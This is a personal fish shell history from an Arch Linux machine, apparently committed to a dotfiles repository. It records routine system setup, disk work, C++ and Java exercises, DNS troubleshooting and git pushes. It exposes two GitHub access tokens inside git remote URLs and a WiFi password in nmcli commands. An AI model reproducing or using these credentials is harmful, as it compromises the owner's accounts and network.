    - ~/.config/rofi/
- cmd: cat config.rasi
  when: 1644738150
  paths:
    - config.rasi
- cmd: sudo nano config.rasi
  when: 1644738162
  paths:
    - config.rasi
- cmd: nmcli device wifi connect "raz0229_nomap" password 229rajazafarpotspotNEW0123456789
  when: 1644738319
- cmd: sudo pacman -S cloud-utils
  when: 1644740811
- cmd: gparted
  when: 1644740819
- cmd: growpart /dev/sda 1
  when: 1644741040
  paths:
    - /dev/sda
- cmd: sudo growpart /dev/sda 1
  when: 1644741044
  paths:
    - /dev/sda
- cmd: df -h
  when: 1644741342
- cmd: fdisk /dev/sda
  when: 1644741404
  paths:
    - /dev/sda
- cmd: sudo fdisk /dev/sda
  when: 1644741670
  paths:
    - /dev/sda
- cmd: swapon /dev/sda2
  when: 1644741720
  paths:
    - /dev/sda2
- cmd: sudo swapon /dev/sda2
  when: 1644741723
  paths:
    - /dev/sda2
- cmd: mkdir test-prep
  when: 1644742053
- cmd: cd test-prep/
  when: 1644742056
  paths:
    - test-prep/
- cmd: git clone https://github.com/raz0229/spykeys-web.git ./
  when: 1644742077
  paths:
    - ./
- cmd: sl
  when: 1644743118
- cmd: yay -Sy archlinux-keyring
  when: 1644749726
- cmd: yay -Syu
  when: 1644749752
- cmd: npm run build
  when: 1644770099
- cmd: git commit -m "added test-prep"
  when: 1644770879
- cmd: git remote set-url origin https://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@github.com/raz0229/test-prep.git
  when: 1644770943
- cmd: git remote add origin https://github.com/raz0229/test-prep.git
  when: 1644770976
- cmd: git remote set-url origin https://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@github.com/raz0229/test-prep.git
  when: 1644771106
- cmd: fdisk -l
  when: 1644813374
- cmd: cd /tmp/
  when: 1644813514
  paths:
    - /tmp/
- cmd: sudo rm -rf *
  when: 1644813517
- cmd: sudo mount /dev/sr0 /mnt
  when: 1644813693
  paths:
    - /dev/sr0
    - /mnt
- cmd: sudo mount /dev/cdrom /mnt
  when: 1644813764
  paths:
    - /dev/cdrom
    - /mnt
- cmd: blkid
  when: 1644813835
- cmd: sudo gparted
  when: 1644813993
- cmd: sudo fdisk -l
  when: 1644814113
- cmd: sudo pacman -S setcd
  when: 1644814371
- cmd: sudo lsblk -fp
  when: 1644814411
- cmd: cat /dev/sr0 | head -1
  when: 1644814454
  paths:
    - /dev/sr0
- cmd: sudo mount -t iso9660 /dev/sr0 /mnt/cdrom
  when: 1644814498
  paths:
    - /dev/sr0
- cmd: sudo mount -t iso9660 /dev/cdrom /mnt/
  when: 1644814884
  paths:
    - /dev/cdrom
    - /mnt/
- cmd: sudo pacman -S libdvdpkg
  when: 1644814982
- cmd: sudo pacman -S libdvd-pkg
  when: 1644814988
- cmd: sudo pacman -S libdvdcss
  when: 1644815011
- cmd: sudo mount -t iso9660 /dev/sr0 /mnt/
  when: 1644815041
  paths:
    - /dev/sr0
    - /mnt/
- cmd: sudo pacman -Sy
  when: 1644815177
- cmd: sudo blkid
  when: 1644815204
- cmd: dmesg | grep CD-ROM
  when: 1644815328
- cmd: sudo dmesg | grep CD-ROM
  when: 1644815333
- cmd: sudo dmesg | grep DVD-ROM
  when: 1644815353
- cmd: sudo mount /media/cdrom
  when: 1644815472
- cmd: sudo mount /media/cdrecorder
  when: 1644815488
- cmd: sudo mount /media/dvdrecorder
  when: 1644815494
- cmd: ls /media/
  when: 1644815501
- cmd: sudo dd if=/dev/sr0 of=windows10.iso status=progress
  when: 1644815608
- cmd: sudo dd if=/dev/cdrom of=windows10.iso status=progress
  when: 1644815619
- cmd: yay -S simpleburn
  when: 1644816933
- cmd: yay -S nerolinux4
  when: 1644817022
- cmd: yay -S nerolinux3
  when: 1644817026
- cmd: nero
  when: 1644817202
- cmd: yay -Rsn nerolinux3
  when: 1644817228
- cmd: yay -S brasero
  when: 1644817254
- cmd: isosize -x /dev/sr0
  when: 1644817554
  paths:
    - /dev/sr0
- cmd: git clone https://github.com/CristianHenzel/ClipIt.git
  when: 1644851155
- cmd: cd ClipIt/
  when: 1644851167
  paths:
    - ClipIt/
- cmd: sudo ./autogen.sh
  when: 1644851188
  paths:
    - ./autogen.sh
- cmd: ./configure --with-gtk3
  when: 1644851220
- cmd: make
  when: 1644851235
- cmd: sudo make install
  when: 1644851257
- cmd: clipit
  when: 1644851262
- cmd: sudo nano ~/.config/i3/config
  when: 1644851387
  paths:
    - ~/.config/i3/config
- cmd: sync; echo 3 > /proc/sys/vm/drop_caches
  when: 1644933153
- cmd: sudo sync; echo 3 > /proc/sys/vm/drop_caches
  when: 1644933159
- cmd: sudo sync
  when: 1644933177
- cmd: sudo echo 3 > /proc/sys/vm/drop_caches
  when: 1644933183
- cmd: echo 3 > "/proc/sys/vm/drop_caches"
  when: 1644933190
- cmd: modprobe sg
  when: 1644935581
- cmd: sudo modprobe sg
  when: 1644935592
- cmd: su root
  when: 1644937647
- cmd: sudo cp [PiratePC.Me]* /srv/http/
  when: 1645368046
  paths:
    - /srv/http/
- cmd: sudo systemctl start apache2
  when: 1645368063
- cmd: sudo systemctl start apache
  when: 1645368071
- cmd: sudo systemctl stop httpd
  when: 1645374787
- cmd: gcc fact.cpp
  when: 1645377098
  paths:
    - fact.cpp
- cmd: nano x.cpp
  when: 1645377167
- cmd: gcc x.cpp
  when: 1645377187
  paths:
    - x.cpp
- cmd: sudo gcc x.cpp
  when: 1645377195
  paths:
    - x.cpp
- cmd: sudo gcc x.cpp -lsdtc++
  when: 1645377558
  paths:
    - x.cpp
- cmd: sudo gcc x.cpp -l sdtc++
  when: 1645377572
  paths:
    - x.cpp
- cmd: sudo gcc x.cpp -x c++
  when: 1645377614
  paths:
    - x.cpp
- cmd: sudo gcc -x c++ x.cpp
  when: 1645377628
  paths:
    - x.cpp
- cmd: g++ x.cpp
  when: 1645377646
  paths:
    - x.cpp
- cmd: ls | grep x
  when: 1645377657
- cmd: gcc -o x x.cpp
  when: 1645377749
  paths:
    - x.cpp
- cmd: g++ -o x x.cpp
  when: 1645377764
  paths:
    - x.cpp
- cmd: sudo nano fact.cpp
  when: 1645377845
- cmd: g++ -o fact fact.cpp
  when: 1645377956
  paths:
    - fact.cpp
- cmd: ./fact
  when: 1645377958
- cmd: sudo systemctl start httpd
  when: 1645437065
- cmd: mkdir .dotfiles
  when: 1645447711
- cmd: nano x.sh
  when: 1645447758
- cmd: sudo chmod +x x.sh
  when: 1645447818
  paths:
    - x.sh
- cmd: ./x
  when: 1645447825
- cmd: ./x.sh
  when: 1645447829
- cmd: sudo mv ~/.config/i3/config ~/.dotfiles/
  when: 1645448315
  paths:
    - ~/.config/i3/config
    - ~/.dotfiles/
- cmd: sudo ln -s ~/.dotfiles/config ~/.config/i3/config
  when: 1645448362
  paths:
    - ~/.dotfiles/config
- cmd: sudo chmod +x configure.sh
  when: 1645464633
  paths:
    - configure.sh
- cmd: echo $HOME
  when: 1645464675
- cmd: find config
  when: 1645464782
- cmd: unlink $HOME/.config/i3/config
  when: 1645465668
  paths:
    - $HOME/.config/i3/config
- cmd: rm -rf $HOME/.config/i3/config
  when: 1645465695
- cmd: sudo su
  when: 1645466641
- cmd: ln -s ~/.dotfiles/config ~/.config/i3/config
  when: 1645521065
  paths:
    - ~/.dotfiles/config
    - ~/.config/i3/config
- cmd: ln -s ~/.dotfiles/i3/config ~/.config/i3/config
  when: 1645521306
  paths:
    - ~/.dotfiles/i3/config
- cmd: ls -al
  when: 1645521380
- cmd: ls | grep conf
  when: 1645521427
- cmd: cd ~/.dotfiles/
  when: 1645525776
  paths:
    - ~/.dotfiles/
- cmd: feh --bg-scale ~/Pictures/cos.jpg
  when: 1645525893
  paths:
    - ~/Pictures/cos.jpg
- cmd: feh --bg-scale ~/Pictures/cosmos.jpg
  when: 1645526001
  paths:
    - ~/Pictures/cosmos.jpg
- cmd: cd ~/Documents/spykeys-web/api
  when: 1645526190
  paths:
    - ~/Documents/spykeys-web/api
- cmd: neofetch
  when: 1645526423
- cmd: mousepad readme.md
  when: 1645527073
- cmd: mousepad README.md
  when: 1645527089
- cmd: git branch -M main
  when: 1645527855
- cmd: git push -u origin main
  when: 1645527860
- cmd: cleaar
  when: 1645527963
- cmd: git add share/fish/fish_history
  when: 1645528105
  paths:
    - share/fish/fish_history
- cmd: git init
  when: 1645528151
- cmd: git add .
  when: 1645528194
  paths:
    - .
- cmd: git status
  when: 1645528196
- cmd: git commit -m "added files"
  when: 1645528203
- cmd: git branch -M master
  when: 1645528209
- cmd: git remote add origin https://github.com/raz0229/.dotfiles.git
  when: 1645528230
- cmd: git remote set-url origin https://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@github.com/raz0229/.dotfiles.git
  when: 1645528236
- cmd: git push -u origin master
  when: 1645528247
- cmd: cd .dotfiles/
  when: 1645528365
  paths:
    - .dotfiles/
- cmd: ./configure.sh
  when: 1645528388
- cmd: nano configure.sh
  when: 1645528397
- cmd: nano fibonacci.cpp
  when: 1645600860
- cmd: g++ -o fibonacci fibonacci.cpp
  when: 1645601582
  paths:
    - fibonacci.cpp
- cmd: ./fibonacci
  when: 1645601584
- cmd: java fibonacci
  when: 1645614644
  paths:
    - fibonacci
- cmd: clear
  when: 1645614673
- cmd: git clone https://github.com/iamshaunjp/sveltekit-tutorial.git
  when: 1645704888
- cmd: cd sveltekit-tutorial/
  when: 1645704992
  paths:
    - sveltekit-tutorial/
- cmd: npm install
  when: 1645712217
- cmd: cd ~/Documents/sveltekit-tutorial-lesson-15/ninja-gaming/
  when: 1645712241
  paths:
    - ~/Documents/sveltekit-tutorial-lesson-15/ninja-gaming/
- cmd: cat package.json
  when: 1645712244
  paths:
    - package.json
- cmd: code .
  when: 1645712282
  paths:
    - .
- cmd: touch hurairah.txt
  when: 1645723389
- cmd: node hurairah.txt
  when: 1645723394
  paths:
    - hurairah.txt
- cmd: nano hurairah.txt
  when: 1645723408
  paths:
    - hurairah.txt
- cmd: nano 00scientific_calculator.cpp
  when: 1645803349
- cmd: xbindkeys
  when: 1645807902
- cmd: killall -9 xbindkeys
  when: 1645814492
- cmd: ifconfig
  when: 1645871004
- cmd: sudo pacman -S dhclient
  when: 1645871096
- cmd: sudo dhclient -r
  when: 1645871138
- cmd: sudo dhclient
  when: 1645871141
- cmd: nmcli device wifi connect raz0229_nomap password 229rajazafarpotspotNEW0123456789
  when: 1645871146
- cmd: sudo dhclient -r wlan0
  when: 1645871182
- cmd: sudo dhclient wlan0
  when: 1645871189
- cmd: cat /etc/hosts
  when: 1645871383
  paths:
    - /etc/hosts
- cmd: sudo systemd-resolve --flush-caches
  when: 1645871689
- cmd: sudo resolvectl flush-caches
  when: 1645871723
- cmd: sudo killall -USR2 systemd-resolved
  when: 1645871763
- cmd: sudo journalctl -r -u systemd-resolved
  when: 1645871788
- cmd: ps ax | grep dnsmasq
  when: 1645871853
- cmd: sudo /etc/init.d/dns-clean restart
  when: 1645871902
- cmd: nscd K
  when: 1645871967
- cmd: nscd -K
  when: 1645871973
- cmd: sudo nscd -K
  when: 1645871977
- cmd: sudo nscd
  when: 1645871988
- cmd: ping instagram.com
  when: 1645872075
- cmd: ping google.com
  when: 1645872082
- cmd: ping https://google.com
  when: 1645872091
- cmd: ping https://www.google.com
  when: 1645872096
- cmd: ping www.google.com
  when: 1645872099
- cmd: cat /etc/resolv.conf
  when: 1645872205
  paths:
    - /etc/resolv.conf
- cmd: curl -v instagram.com > /dev/null
  when: 1645872262
- cmd: curl -v google.com > /dev/null
  when: 1645872270
- cmd: timedatectl set-ntp true
  when: 1645872689
- cmd: sudo pacman -S ntp
  when: 1645873102
- cmd: sudo systemctl enable ntpd
  when: 1645873124
- cmd: sudo systemctl start ntpd
  when: 1645873131
- cmd: ping www.instagram.com
  when: 1645873199
- cmd: nano fibonacci.java
  when: 1645943155
- cmd: javac fibonacci.java
  when: 1645943198
  paths:
    - fibonacci.java
- cmd: java fibonacci.java
  when: 1645943201
  paths:
    - fibonacci.java
- cmd: cd ~/Documents/
  when: 1646032562
  paths:
    - ~/Documents/
- cmd: mkdir cpp-tuts
  when: 1646032570
- cmd: sudo pacman -S gdb
  when: 1646032828
- cmd: ls /usr/bin | grep gdb
  when: 1646032957
  paths:
    - /usr/bin
- cmd: g++ NewClass.cpp NewClass.h main.cpp -o main
  when: 1646043206
  paths:
    - NewClass.cpp
    - NewClass.h
    - main.cpp
- cmd: ./main
  when: 1646043216
- cmd: npm run dev
  when: 1646558070
- cmd: pactl list short
  when: 1646570680
- cmd: pactl set-sink-mute 1 0
  when: 1646570705
- cmd: pactl module-alsa-card 1 0
  when: 1646570724
- cmd: pavucontrol --help
  when: 1646570732
- cmd: pactl set-sink-mute 6 1
  when: 1646570762
- cmd: pactl set-sink-mute 0 1
  when: 1646570800
- cmd: pactl set-sink-mute 0 0
  when: 1646570808
- cmd: cd ~/.dotfiles/i3/
  when: 1646570896
  paths:
    - ~/.dotfiles/i3/
- cmd: ls
  when: 1646570898
- cmd: nano config
  when: 1646570905
  paths:
    - config
- cmd: git commit -m "volume control"
  when: 1646571207
- cmd: cd ..
  when: 1646571237
  paths:
    - ..
- cmd: git commit -m "volume control"
  when: 1646571239
- cmd: git add i3/config share/fish/fish_history
  when: 1646571254
  paths:
    - i3/config
    - share/fish/fish_history
